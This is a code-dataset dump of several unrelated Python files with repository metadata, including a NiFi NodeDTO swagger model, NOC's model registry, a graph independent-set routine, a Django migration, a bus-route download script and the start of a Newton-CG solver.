def active_thread_count(self):
"""
Gets the active_thread_count of this NodeDTO.
The active threads for the NiFi on the node.
:return: The active_thread_count of this NodeDTO.
:rtype: int
"""
return self._active_thread_count
@active_thread_count.setter
def active_thread_count(self, active_thread_count):
"""
Sets the active_thread_count of this NodeDTO.
The active threads for the NiFi on the node.
:param active_thread_count: The active_thread_count of this NodeDTO.
:type: int
"""
self._active_thread_count = active_thread_count
@property
def queued(self):
"""
Gets the queued of this NodeDTO.
        The queued content for the NiFi on the node.
:return: The queued of this NodeDTO.
:rtype: str
"""
return self._queued
@queued.setter
def queued(self, queued):
"""
Sets the queued of this NodeDTO.
        The queued content for the NiFi on the node.
:param queued: The queued of this NodeDTO.
:type: str
"""
self._queued = queued
@property
def events(self):
"""
Gets the events of this NodeDTO.
The node's events.
:return: The events of this NodeDTO.
:rtype: list[NodeEventDTO]
"""
return self._events
@events.setter
def events(self, events):
"""
Sets the events of this NodeDTO.
The node's events.
:param events: The events of this NodeDTO.
:type: list[NodeEventDTO]
"""
self._events = events
@property
def node_start_time(self):
"""
Gets the node_start_time of this NodeDTO.
The time at which this Node was last refreshed.
:return: The node_start_time of this NodeDTO.
:rtype: str
"""
return self._node_start_time
@node_start_time.setter
def node_start_time(self, node_start_time):
"""
Sets the node_start_time of this NodeDTO.
The time at which this Node was last refreshed.
:param node_start_time: The node_start_time of this NodeDTO.
:type: str
"""
self._node_start_time = node_start_time
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
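    # Illustrative sketch (hypothetical values): to_dict() converts nested swagger
    # models recursively, so NodeDTO(node_id='abc', address='host-1', api_port=8080).to_dict()
    # yields {'node_id': 'abc', 'address': 'host-1', 'api_port': 8080, ...} with the
    # remaining attributes left as None.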
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, NodeDTO):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| 26.684729
| 479
| 0.567011
|
cdb91177deccef3c40e9a2ed356617713369c20c
| 17,888
|
py
|
Python
|
models.py
|
xUndero/noc
|
9fb34627721149fcf7064860bd63887e38849131
|
[
"BSD-3-Clause"
] | 1
|
2019-09-20T09:36:48.000Z
|
2019-09-20T09:36:48.000Z
|
models.py
|
ewwwcha/noc
|
aba08dc328296bb0e8e181c2ac9a766e1ec2a0bb
|
[
"BSD-3-Clause"
] | null | null | null |
models.py
|
ewwwcha/noc
|
aba08dc328296bb0e8e181c2ac9a766e1ec2a0bb
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# ---------------------------------------------------------------------
# NOC models lazy loading and utilities
# ---------------------------------------------------------------------
# Copyright (C) 2007-2019 The NOC Project
# See LICENSE for details
# ---------------------------------------------------------------------
# Python modules
import logging
logger = logging.getLogger(__name__)
def is_document(object):
    """
    Check whether object is a mongoengine document
    :param object: instance to check
    :return: True if the instance is a mongoengine document, False otherwise
    """
    return getattr(object, "_is_document", False)
def get_model_id(object):
"""
Returns model id for instance object
"""
if is_document(object):
# Document
return "%s.%s" % (object.__module__.split(".")[1], object._class_name)
else:
# Model
return "%s.%s" % (
object._meta.app_label if object._meta.app_label != "auth" else "main",
object._meta.object_name,
)
def get_model(model_id):
"""
Returns model/document class for given model id
"""
m = _MCACHE.get(model_id)
if not m:
assert model_id in _MODELS, "Invalid model id: %s" % model_id
logger.debug("Loading model %s", model_id)
mp = _MODELS[model_id]
mod_name, cls_name = mp.rsplit(".", 1)
mod = __import__(mod_name, {}, {}, [cls_name])
m = getattr(mod, cls_name)
_MCACHE[model_id] = m
return m
def get_object(model_id, object_id):
"""
Return an object instance or None
"""
m = get_model(model_id)
try:
return m.objects.get(id=object_id)
except m.DoesNotExist:
return None
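# Hedged usage sketch (illustration only; assumes a configured NOC environment in
# which the referenced model modules import cleanly, and `some_id` is hypothetical):
#     ManagedObject = get_model("sa.ManagedObject")   # lazily imported, then cached
#     mo = get_object("sa.ManagedObject", some_id)    # None if no such object exists
#     assert mo is None or get_model_id(mo) == "sa.ManagedObject"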
def load_models():
for alias in _MODELS:
get_model(alias)
def iter_model_id():
"""
Iterate all model ids
"""
for m in _MODELS:
yield m
# Model cache: model_id -> class
_MCACHE = {}
_MODELS = {
# aaa models
"aaa.APIKey": "noc.aaa.models.apikey.APIKey",
"aaa.Group": "noc.aaa.models.group.Group",
"aaa.Permission": "noc.aaa.models.permission.Permission",
"aaa.User": "noc.aaa.models.user.User",
"aaa.UserContact": "noc.aaa.models.usercontact.UserContact",
# main models
"main.APIToken": "noc.main.models.apitoken.APIToken",
"main.AuditTrail": "noc.main.models.audittrail.AuditTrail",
"main.Checkpoint": "noc.main.models.checkpoint.Checkpoint",
"main.CHPolicy": "noc.main.models.chpolicy.CHPolicy",
"main.CronTab": "noc.main.models.crontab.CronTab",
"main.CustomField": "noc.main.models.customfield.CustomField",
"main.CustomFieldEnumGroup": "noc.main.models.customfieldenumgroup.CustomFieldEnumGroup",
"main.CustomFieldEnumValue": "noc.main.models.customfieldenumvalue.CustomFieldEnumValue",
"main.DatabaseStorage": "noc.main.models.databasestorage.DatabaseStorage",
"main.DocCategory": "noc.main.models.doccategory.DocCategory",
"main.ExtStorage": "noc.main.models.extstorage.ExtStorage",
"main.Favorites": "noc.main.models.favorites.Favorites",
"main.Handler": "noc.main.models.handler.Handler",
"main.Language": "noc.main.models.language.Language",
"main.MIMEType": "noc.main.models.mimetype.MIMEType",
"main.NotificationGroup": "noc.main.models.notificationgroup.NotificationGroup",
"main.NotificationGroupOther": "noc.main.models.notificationgroup.NotificationGroupOther",
"main.NotificationGroupUser": "noc.main.models.notificationgroup.NotificationGroupUser",
"main.OrderMap": "noc.main.models.ordermap.OrderMap",
"main.Pool": "noc.main.models.pool.Pool",
"main.PrefixTable": "noc.main.models.prefixtable.PrefixTable",
"main.PyRule": "noc.main.models.pyrule.PyRule",
"main.RefBook": "noc.main.models.refbook.RefBook",
"main.RefBookData": "noc.main.models.refbookdata.RefBookData",
"main.RefBookField": "noc.main.models.refbookfield.RefBookField",
"main.RemoteSystem": "noc.main.models.remotesystem.RemoteSystem",
"main.ReportSubscription": "noc.main.models.reportsubscription.ReportSubscription",
"main.ResourceState": "noc.main.models.resourcestate.ResourceState",
"main.SlowOp": "noc.main.models.slowop.SlowOp",
"main.Style": "noc.main.models.style.Style",
"main.SystemNotification": "noc.main.models.systemnotification.SystemNotification",
"main.SystemTemplate": "noc.main.models.systemtemplate.SystemTemplate",
"main.Tag": "noc.main.models.tag.Tag",
"main.Template": "noc.main.models.template.Template",
"main.TextIndex": "noc.main.models.textindex.TextIndex",
"main.TimePattern": "noc.main.models.timepattern.TimePattern",
"main.TimePatternTerm": "noc.main.models.timepatternterm.TimePatternTerm",
"main.UserState": "noc.main.models.userstate.UserState",
#
"dev.Quiz": "noc.dev.models.quiz.Quiz",
"dev.Spec": "noc.dev.models.spec.Spec",
# project models
"project.Project": "noc.project.models.project.Project",
# gis models
"gis.Address": "noc.gis.models.address.Address",
"gis.Area": "noc.gis.models.area.Area",
"gis.Building": "noc.gis.models.building.Building",
"gis.Division": "noc.gis.models.division.Division",
"gis.Layer": "noc.gis.models.layer.Layer",
"gis.LayerUserSettings": "noc.gis.models.layerusersettings.LayerUserSettings",
"gis.Overlay": "noc.gis.models.overlay.Overlay",
"gis.Street": "noc.gis.models.street.Street",
# inv models
"inv.AllocationGroup": "noc.inv.models.allocationgroup.AllocationGroup",
"inv.Capability": "noc.inv.models.capability.Capability",
"inv.ConnectionRule": "noc.inv.models.connectionrule.ConnectionRule",
"inv.ConnectionType": "noc.inv.models.connectiontype.ConnectionType",
"inv.Coverage": "noc.inv.models.coverage.Coverage",
"inv.CoveredBuilding": "noc.inv.models.coveredbuilding.CoveredBuilding",
"inv.CoveredObject": "noc.inv.models.coveredobject.CoveredObject",
"inv.DiscoveryID": "noc.inv.models.discoveryid.DiscoveryID",
"inv.Firmware": "noc.inv.models.firmware.Firmware",
"inv.FirmwarePolicy": "noc.inv.models.firmwarepolicy.FirmwarePolicy",
"inv.ForwardingInstance": "noc.inv.models.forwardinginstance.ForwardingInstance",
"inv.Interface": "noc.inv.models.interface.Interface",
"inv.InterfaceClassificationRule": "noc.inv.models.interfaceclassificationrule.InterfaceClassificationRule",
"inv.InterfaceProfile": "noc.inv.models.interfaceprofile.InterfaceProfile",
"inv.Link": "noc.inv.models.link.Link",
"inv.MACDB": "noc.inv.models.macdb.MACDB",
"inv.MACLog": "noc.inv.models.maclog.MACLog",
"inv.MapSettings": "noc.inv.models.mapsettings.MapSettings",
"inv.ModelConnectionsCache": "noc.inv.models.objectmodel.ModelConnectionsCache",
"inv.ModelInterface": "noc.inv.models.modelinterface.ModelInterface",
"inv.ModelMapping": "noc.inv.models.modelmapping.ModelMapping",
"inv.NetworkSegment": "noc.inv.models.networksegment.NetworkSegment",
"inv.NetworkSegmentProfile": "noc.inv.models.networksegmentprofile.NetworkSegmentProfile",
"inv.NewAddressDiscoveryLog": "noc.inv.models.newaddressdiscoverylog.NewAddressDiscoveryLog",
"inv.NewPrefixDiscoveryLog": "noc.inv.models.newprefixdiscoverylog.NewPrefixDiscoveryLog",
"inv.Object": "noc.inv.models.object.Object",
"inv.ObjectConnection": "noc.inv.models.objectconnection.ObjectConnection",
"inv.ObjectFile": "noc.inv.models.objectfile.ObjectFile",
"inv.ObjectLog": "noc.inv.models.objectlog.ObjectLog",
"inv.ObjectModel": "noc.inv.models.objectmodel.ObjectModel",
"inv.Platform": "noc.inv.models.platform.Platform",
"inv.SubInterface": "noc.inv.models.subinterface.SubInterface",
"inv.Technology": "noc.inv.models.technology.Technology",
"inv.ResourceGroup": "noc.inv.models.resourcegroup.ResourceGroup",
"inv.UnknownModel": "noc.inv.models.unknownmodel.UnknownModel",
"inv.Vendor": "noc.inv.models.vendor.Vendor",
# sa models
"sa.Action": "noc.sa.models.action.Action",
"sa.ActionCommands": "noc.sa.models.actioncommands.ActionCommands",
"sa.AdministrativeDomain": "noc.sa.models.administrativedomain.AdministrativeDomain",
"sa.AuthProfile": "noc.sa.models.authprofile.AuthProfile",
"sa.AuthProfileSuggestSNMP": "noc.sa.models.authprofile.AuthProfileSuggestSNMP",
"sa.AuthProfileSuggestCLI": "noc.sa.models.authprofile.AuthProfileSuggestCLI",
"sa.CapsProfile": "noc.sa.models.capsprofile.CapsProfile",
"sa.CommandSnippet": "noc.sa.models.commandsnippet.CommandSnippet",
"sa.CPEStatus": "noc.sa.models.cpestatus.CPEStatus",
"sa.GroupAccess": "noc.sa.models.groupaccess.GroupAccess",
"sa.InteractionLog": "noc.sa.models.interactionlog.InteractionLog",
"sa.ManagedObject": "noc.sa.models.managedobject.ManagedObject",
"sa.ManagedObjectAttribute": "noc.sa.models.managedobject.ManagedObjectAttribute",
"sa.ManagedObjectProfile": "noc.sa.models.managedobjectprofile.ManagedObjectProfile",
"sa.ManagedObjectSelector": "noc.sa.models.managedobjectselector.ManagedObjectSelector",
"sa.ManagedObjectSelectorByAttribute": "noc.sa.models.managedobjectselector.ManagedObjectSelectorByAttribute",
"sa.ObjectCapabilities": "noc.sa.models.objectcapabilities.ObjectCapabilities",
"sa.ObjectNotification": "noc.sa.models.objectnotification.ObjectNotification",
"sa.ObjectStatus": "noc.sa.models.objectstatus.ObjectStatus",
"sa.Profile": "noc.sa.models.profile.Profile",
"sa.ProfileCheckRule": "noc.sa.models.profilecheckrule.ProfileCheckRule",
"sa.Service": "noc.sa.models.service.Service",
"sa.ServiceProfile": "noc.sa.models.serviceprofile.ServiceProfile",
"sa.ServiceSummary": "noc.sa.models.servicesummary.ServiceSummary",
"sa.UserAccess": "noc.sa.models.useraccess.UserAccess",
# fm models
"fm.ActiveAlarm": "noc.fm.models.activealarm.ActiveAlarm",
"fm.ActiveEvent": "noc.fm.models.activeevent.ActiveEvent",
"fm.AlarmClass": "noc.fm.models.alarmclass.AlarmClass",
"fm.AlarmClassCategory": "noc.fm.models.alarmclasscategory.AlarmClassCategory",
"fm.AlarmClassConfig": "noc.fm.models.alarmclassconfig.AlarmClassConfig",
"fm.AlarmDiagnosticConfig": "noc.fm.models.alarmdiagnosticconfig.AlarmDiagnosticConfig",
"fm.AlarmSeverity": "noc.fm.models.alarmseverity.AlarmSeverity",
"fm.AlarmTrigger": "noc.fm.models.alarmtrigger.AlarmTrigger",
"fm.ArchivedAlarm": "noc.fm.models.archivedalarm.ArchivedAlarm",
"fm.ArchivedEvent": "noc.fm.models.archivedevent.ArchivedEvent",
"fm.CloneClassificationRule": "noc.fm.models.cloneclassificationrule.CloneClassificationRule",
"fm.Enumeration": "noc.fm.models.enumeration.Enumeration",
"fm.EventClass": "noc.fm.models.eventclass.EventClass",
"fm.EventClassCategory": "noc.fm.models.eventclass.EventClassCategory",
"fm.EventClassificationRule": "noc.fm.models.eventclassificationrule.EventClassificationRule",
"fm.EventClassificationRuleCategory": "noc.fm.models.eventclassificationrule.EventClassificationRuleCategory",
"fm.EventTrigger": "noc.fm.models.eventtrigger.EventTrigger",
"fm.FailedEvent": "noc.fm.models.failedevent.FailedEvent",
"fm.IgnoreEventRules": "noc.fm.models.ignoreeventrules.IgnoreEventRules",
"fm.IgnorePattern": "noc.fm.models.ignorepattern.IgnorePattern",
"fm.MIB": "noc.fm.models.mib.MIB",
"fm.MIBAlias": "noc.fm.models.mibalias.MIBAlias",
"fm.MIBData": "noc.fm.models.mibdata.MIBData",
"fm.MIBPreference": "noc.fm.models.mibpreference.MIBPreference",
"fm.OIDAlias": "noc.fm.models.oidalias.OIDAlias",
"fm.Outage": "noc.fm.models.outage.Outage",
"fm.Reboot": "noc.fm.models.reboot.Reboot",
"fm.SyntaxAlias": "noc.fm.models.syntaxalias.SyntaxAlias",
"fm.TTSystem": "noc.fm.models.ttsystem.TTSystem",
"fm.Uptime": "noc.fm.models.uptime.Uptime",
# pm models
"pm.MetricScope": "noc.pm.models.metricscope.MetricScope",
"pm.MetricType": "noc.pm.models.metrictype.MetricType",
"pm.ThresholdProfile": "noc.pm.models.thresholdprofile.ThresholdProfile",
# cm models
"cm.ConfDBQuery": "noc.cm.models.confdbquery.ConfDBQuery",
"cm.ErrorType": "noc.cm.models.errortype.ErrorType",
"cm.InterfaceValidationPolicy": "noc.cm.models.interfacevalidationpolicy.InterfaceValidationPolicy",
"cm.ObjectFact": "noc.cm.models.objectfact.ObjectFact",
"cm.ObjectNotify": "noc.cm.models.objectnotify.ObjectNotify",
"cm.ObjectValidationPolicy": "noc.cm.models.objectvalidationpolicy.ObjectValidationPolicy",
"cm.ValidationPolicy": "noc.cm.models.validationpolicy.ValidationPolicy",
"cm.ValidationPolicySettings": "noc.cm.models.validationpolicysettings.ValidationPolicySettings",
"cm.ValidationRule": "noc.cm.models.validationrule.ValidationRule",
# ip models
"ip.Address": "noc.ip.models.address.Address",
"ip.AddressProfile": "noc.ip.models.addressprofile.AddressProfile",
"ip.AddressRange": "noc.ip.models.addressrange.AddressRange",
"ip.Prefix": "noc.ip.models.prefix.Prefix",
"ip.PrefixAccess": "noc.ip.models.prefixaccess.PrefixAccess",
"ip.PrefixBookmark": "noc.ip.models.prefixbookmark.PrefixBookmark",
"ip.PrefixProfile": "noc.ip.models.prefixprofile.PrefixProfile",
"ip.VRF": "noc.ip.models.vrf.VRF",
"ip.VRFGroup": "noc.ip.models.vrfgroup.VRFGroup",
# vc models
"vc.VC": "noc.vc.models.vc.VC",
"vc.VCBindFilter": "noc.vc.models.vcbindfilter.VCBindFilter",
"vc.VCDomain": "noc.vc.models.vcdomain.VCDomain",
"vc.VCDomainProvisioningConfig": "noc.vc.models.vcdomainprovisioningconfig.VCDomainProvisioningConfig",
"vc.VCFilter": "noc.vc.models.vcfilter.VCFilter",
"vc.VCType": "noc.vc.models.vctype.VCType",
"vc.VLANProfile": "noc.vc.models.vlanprofile.VLANProfile",
"vc.VLAN": "noc.vc.models.vlan.VLAN",
"vc.VPNProfile": "noc.vc.models.vpnprofile.VPNProfile",
"vc.VPN": "noc.vc.models.vpn.VPN",
# dns models
"dns.DNSServer": "noc.dns.models.dnsserver.DNSServer",
"dns.DNSZone": "noc.dns.models.dnszone.DNSZone",
"dns.DNSZoneProfile": "noc.dns.models.dnszoneprofile.DNSZoneProfile",
"dns.DNSZoneRecord": "noc.dns.models.dnszonerecord.DNSZoneRecord",
# peer models
"peer.ASProfile": "noc.peer.models.asprofile.ASProfile",
"peer.AS": "noc.peer.models.asn.AS",
"peer.ASSet": "noc.peer.models.asset.ASSet",
"peer.Community": "noc.peer.models.community.Community",
"peer.CommunityType": "noc.peer.models.communitytype.CommunityType",
"peer.Maintainer": "noc.peer.models.maintainer.Maintainer",
"peer.Organisation": "noc.peer.models.organisation.Organisation",
"peer.Peer": "noc.peer.models.peer.Peer",
"peer.PeerGroup": "noc.peer.models.peergroup.PeerGroup",
"peer.PeeringPoint": "noc.peer.models.peeringpoint.PeeringPoint",
"peer.Person": "noc.peer.models.person.Person",
"peer.PrefixListCache": "noc.peer.models.prefixlistcache.PrefixListCache",
"peer.RIR": "noc.peer.models.rir.RIR",
"peer.WhoisASSetMembers": "noc.peer.models.whoisassetmembers.WhoisASSetMembers",
"peer.WhoisOriginRoute": "noc.peer.models.whoisoriginroute.WhoisOriginRoute",
# kb models
"kb.KBEntry": "noc.kb.models.kbentry.KBEntry",
"kb.KBEntryAttachment": "noc.kb.models.kbentryattachment.KBEntryAttachment",
"kb.KBEntryHistory": "noc.kb.models.kbentryhistory.KBEntryHistory",
"kb.KBEntryPreviewLog": "noc.kb.models.kbentrypreviewlog.KBEntryPreviewLog",
"kb.KBEntryTemplate": "noc.kb.models.kbentrytemplate.KBEntryTemplate",
"kb.KBGlobalBookmark": "noc.kb.models.kbglobalbookmark.KBGlobalBookmark",
"kb.KBUserBookmark": "noc.kb.models.kbuserbookmark.KBUserBookmark",
# Maintenance
"maintenance.Maintenance": "noc.maintenance.models.maintenance.Maintenance",
"maintenance.MaintenanceType": "noc.maintenance.models.maintenancetype.MaintenanceType",
# support models
"support.Crashinfo": "noc.support.models.crashinfo.Crashinfo",
# crm models
"crm.SubscriberProfile": "noc.crm.models.subscriberprofile.SubscriberProfile",
"crm.SupplierProfile": "noc.crm.models.supplierprofile.SupplierProfile",
"crm.Subscriber": "noc.crm.models.subscriber.Subscriber",
"crm.Supplier": "noc.crm.models.supplier.Supplier",
# sla models
"sla.SLAProfile": "noc.sla.models.slaprofile.SLAProfile",
"sla.SLAProbe": "noc.sla.models.slaprobe.SLAProbe",
# bi models
"bi.DashboardLayout": "noc.bi.models.dashboardlayout.DashboardLayout",
# phone models
"phone.DialPlan": "noc.phone.models.dialplan.DialPlan",
"phone.NumberCategory": "noc.phone.models.numbercategory.NumberCategory",
"phone.PhoneNumber": "noc.phone.models.phonenumber.PhoneNumber",
"phone.PhoneNumberProfile": "noc.phone.models.phonenumberprofile.PhoneNumberProfile",
"phone.PhoneRange": "noc.phone.models.phonerange.PhoneRange",
"phone.PhoneRangeProfile": "noc.phone.models.phonerangeprofile.PhoneRangeProfile",
# wf models
"wf.Workflow": "noc.wf.models.workflow.Workflow",
"wf.State": "noc.wf.models.state.State",
"wf.Transition": "noc.wf.models.transition.Transition",
}
FTS_MODELS = ["ip.Address", "ip.Prefix", "ip.VRF", "vc.VC", "sa.ManagedObject"]
COLLECTIONS = [
"fm.SyntaxAlias",
"sa.Profile",
"dev.Quiz",
"dev.Spec",
"sa.Action",
"inv.Capability",
"pm.MetricScope",
"pm.MetricType",
"fm.Enumeration",
"inv.ConnectionRule",
"inv.ConnectionType",
"inv.Vendor",
"inv.Platform",
"inv.Firmware",
"fm.MIBAlias",
"gis.Layer",
"cm.ErrorType",
"fm.OIDAlias",
"inv.Technology",
"fm.MIBPreference",
"inv.ModelInterface",
"fm.AlarmSeverity",
"sa.ActionCommands",
"inv.ObjectModel",
"fm.AlarmClass",
"fm.EventClass",
"fm.EventClassificationRule",
"fm.CloneClassificationRule",
"sa.ProfileCheckRule",
"bi.DashboardLayout",
"cm.ConfDBQuery",
]
| 49.142857
| 114
| 0.712768
|
86686b8c674ae561149c2ef3d92772719be3f215
| 3,698
|
py
|
Python
|
nrpcalc/base/recovery.py
|
TimothyStiles/nrpcalc
|
42ab25e929d472c2e808dd3bec6430bc80b42a06
|
[
"MIT"
] | 6
|
2020-07-27T17:59:19.000Z
|
2022-03-18T03:33:17.000Z
|
nrpcalc/base/recovery.py
|
TimothyStiles/nrpcalc
|
42ab25e929d472c2e808dd3bec6430bc80b42a06
|
[
"MIT"
] | 3
|
2020-07-17T23:10:36.000Z
|
2021-09-10T05:19:47.000Z
|
nrpcalc/base/recovery.py
|
TimothyStiles/nrpcalc
|
42ab25e929d472c2e808dd3bec6430bc80b42a06
|
[
"MIT"
] | 3
|
2020-07-27T17:59:22.000Z
|
2021-02-08T15:47:28.000Z
|
import sys
from . import vercov
import networkx as nx
from itertools import count
from time import time
from math import log10
def is_graph_empty(homology_graph):
if not homology_graph.number_of_nodes():
return True
return False
def get_vercov_func(vercov_func, homology_graph):
# TO DO: NEED TO USE DIFFERENT FUNCTIONS AT DIFFERENT EDGE COUNT SCALES!!
if vercov_func == 'nrpG':
return vercov.nrp_vercov_greedy, 'NRP Greedy'
elif vercov_func == '2apx':
# return vercov.std_vercov_approx, 'Standard 2-approximation'
return vercov.nx_vercov, 'Standard 2-approximation'
else:
return vercov.nrp_vercov_approx, 'NRP 2-approximation'
def dump_homology_graph(homology_graph, graph_file):
nx.write_adjlist(homology_graph, graph_file)
def load_homology_graph(graph_file):
return nx.read_adjlist(graph_file, nodetype=int)
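# Minimal sketch of the recovery entry point defined below (illustration only;
# the toy graph and the scratch file path are hypothetical):
#     G = nx.Graph([(0, 1), (1, 2), (3, 4)])
#     kept = get_recovered_non_homologs(G, '/tmp/homology.adjlist', verbose=False)
#     # 'kept' is an independent set of G, e.g. {0, 2, 3}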
def get_recovered_non_homologs(homology_graph, graph_file, vercov_func=None, verbose=True):
indiset_nodes = set()
# powertex_elimination(homology_graph, verbose)
completex_nodes = [] #completex_elimination(homology_graph, verbose)
# indiset_nodes.update(completex_nodes)
possible_nodes = set(homology_graph.nodes())
if verbose:
        print('\n [+] Initial independent set = {} ({} complete vertices eliminated), computing vertex cover on remaining {} nodes.'.format(len(indiset_nodes), len(completex_nodes), len(possible_nodes)))
if is_graph_empty(homology_graph):
if verbose:
print(' [X] Graph is empty, further independent set expansion not possible, terminating.')
else:
vercov_func, vercov_func_name = get_vercov_func(vercov_func, homology_graph)
iteration = -1
if verbose:
print(' [+] Vertex Cover Function: {}'.format(vercov_func_name))
sys.stdout.write(' [+] Dumping graph into: {}'.format(graph_file))
t0 = time()
dump_homology_graph(homology_graph, graph_file)
if verbose:
sys.stdout.write(' in {} seconds\n'.format(time()-t0))
while True:
iteration += 1
if verbose:
print('\n----------------------')
print('Now running iteration: {}'.format(iteration))
print('----------------------')
t0 = time()
if iteration > 0:
homology_graph = nx.Graph(homology_graph.subgraph(possible_nodes))
vercov_nodes = vercov_func(homology_graph, verbose)
if verbose:
print('\n [+] Computed vertex cover of size: {} (in {:.4} seconds)'.format(len(vercov_nodes), time()-t0))
print(' [+] Loading graph from: {}'.format(graph_file))
homology_graph = load_homology_graph(graph_file)
new_indiset_nodes = possible_nodes - vercov_nodes
indiset_nodes |= new_indiset_nodes
possible_nodes = vercov_nodes
prev_possibility_count = len(possible_nodes)
for indi_node in new_indiset_nodes:
possible_nodes.difference_update(homology_graph[indi_node])
curr_possibility_count = len(possible_nodes)
if verbose:
print(' [+] Current independent set size: {}'.format(len(indiset_nodes)))
print(' [+] Potential nodes for expansion: {} (projected independent set size: {})'.format(len(possible_nodes), len(indiset_nodes)+len(possible_nodes)))
if len(possible_nodes) == 0 or prev_possibility_count == curr_possibility_count:
if verbose:
print(' [X] Cannot expand independent set, terminating.')
break
return indiset_nodes
| 38.123711
| 169
| 0.642509
|
4a799428ea828ce7c8dea582838fee65f81ae2d1
| 1,185
|
py
|
Python
|
pridesport_work/gears/migrations/0001_initial.py
|
Trifon87/pridesport_work
|
9ab47d3c58915c2e791bf8a1fcb3ceee1d8de62c
|
[
"MIT"
] | null | null | null |
pridesport_work/gears/migrations/0001_initial.py
|
Trifon87/pridesport_work
|
9ab47d3c58915c2e791bf8a1fcb3ceee1d8de62c
|
[
"MIT"
] | null | null | null |
pridesport_work/gears/migrations/0001_initial.py
|
Trifon87/pridesport_work
|
9ab47d3c58915c2e791bf8a1fcb3ceee1d8de62c
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.1.3 on 2020-11-12 22:06
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Gear',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('type', models.CharField(choices=[('fight', 'fight'), ('fitness', 'fitness'), ('clothing', 'clothing'), ('unknown', 'Unknown')], default='unknown', max_length=35)),
('name', models.CharField(max_length=35)),
('price', models.FloatField()),
('description', models.TextField(blank=True)),
('image_url', models.URLField()),
],
),
migrations.CreateModel(
name='Like',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('gear', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='gears.gear')),
],
),
]
| 34.852941
| 181
| 0.564557
|
6e366a2baca79ba6bf16ad8e7d157bbee126e0d2
| 1,206
|
py
|
Python
|
script/update-bus-routes.py
|
khanhhua/erlbot
|
4de8656449380d709d8ff44bb2261ab43010bcf3
|
[
"BSD-3-Clause"
] | 6
|
2017-11-29T12:18:21.000Z
|
2022-03-18T14:00:19.000Z
|
script/update-bus-routes.py
|
khanhhua/erlbot
|
4de8656449380d709d8ff44bb2261ab43010bcf3
|
[
"BSD-3-Clause"
] | 4
|
2017-11-13T05:51:00.000Z
|
2017-12-05T09:50:02.000Z
|
script/update-bus-routes.py
|
khanhhua/erlbot
|
4de8656449380d709d8ff44bb2261ab43010bcf3
|
[
"BSD-3-Clause"
] | 1
|
2021-11-10T22:42:46.000Z
|
2021-11-10T22:42:46.000Z
|
import json
import os
import urllib
from urlparse import urlparse
import httplib2 as http  # External library
if __name__ == "__main__":
#Authentication parameters
headers = {
'AccountKey' : os.environ['ACCOUNT_KEY'],
'accept' : 'application/json'
} #this is by default
with open("bus_routes-20171020.csv","w+") as outfile:
#API parameters
skip = 0
print 'Downloading bus routes...'
while True:
print 'Page %d\n' % (skip / 500 + 1)
uri = 'http://datamall2.mytransport.sg/' #Resource URL
path = '/ltaodataservice/BusRoutes?$skip=%d' % skip
target = urlparse(uri + path)
print target.geturl()
method = 'GET'
body = ''
#Get handle to http
h = http.Http()
#Obtain results
response, content = h.request(
target.geturl(),
method,
body,
headers)
#Parse JSON to print
jsonObj = json.loads(content)
#Saving jsonObj["d"]
if len(jsonObj['value']) == 0:
break
for obj in jsonObj['value']:
outfile.write("{BusStopCode}\t{ServiceNo}\t{Direction}\t{StopSequence}\n".format(**obj))
skip += 500
| 27.409091
| 100
| 0.575456
|
698b63067b837a24e2c8f62f0888f7830aca4142
| 13,859
|
py
|
Python
|
torchmin/newton.py
|
dhjpolymath/pytorch-minimize
|
cabe819c97c707fd9f3dc31f50c4520d9c39dfc5
|
[
"MIT"
] | null | null | null |
torchmin/newton.py
|
dhjpolymath/pytorch-minimize
|
cabe819c97c707fd9f3dc31f50c4520d9c39dfc5
|
[
"MIT"
] | null | null | null |
torchmin/newton.py
|
dhjpolymath/pytorch-minimize
|
cabe819c97c707fd9f3dc31f50c4520d9c39dfc5
|
[
"MIT"
] | null | null | null |
from scipy.optimize import OptimizeResult
from scipy.optimize.optimize import _status_message
from scipy.sparse.linalg import eigsh
from torch import Tensor
import torch
from .function import ScalarFunction
from .line_search import strong_wolfe
_status_message['cg_warn'] = "Warning: CG iterations didn't converge. The " \
"Hessian is not positive definite."
def _cg_iters(grad, hess, max_iter, normp=1):
"""A CG solver specialized for the NewtonCG sub-problem.
Derived from Algorithm 7.1 of "Numerical Optimization (2nd Ed.)"
(Nocedal & Wright, 2006; pp. 169)
"""
# Get the most efficient dot product method for this problem
if grad.dim() == 1:
# standard dot product
dot = torch.dot
elif grad.dim() == 2:
# batched dot product
dot = lambda u,v: torch.bmm(u.unsqueeze(1), v.unsqueeze(2)).view(-1,1)
else:
# generalized dot product that supports batch inputs
dot = lambda u,v: u.mul(v).sum(-1, keepdim=True)
g_norm = grad.norm(p=normp)
tol = g_norm * g_norm.sqrt().clamp(0, 0.5)
eps = torch.finfo(grad.dtype).eps
n_iter = 0 # TODO: remove?
maxiter_reached = False
# initialize state and iterate
x = torch.zeros_like(grad)
r = grad.clone()
p = grad.neg()
rs = dot(r, r)
for n_iter in range(max_iter):
if r.norm(p=normp) < tol:
break
Bp = hess.mv(p)
curv = dot(p, Bp)
curv_sum = curv.sum()
if curv_sum < 0:
# hessian is not positive-definite
if n_iter == 0:
# if first step, fall back to steepest descent direction
# (scaled by Rayleigh quotient)
x = grad.mul(rs / curv)
#x = grad.neg()
break
elif curv_sum <= 3 * eps:
break
alpha = rs / curv
x.addcmul_(alpha, p)
r.addcmul_(alpha, Bp)
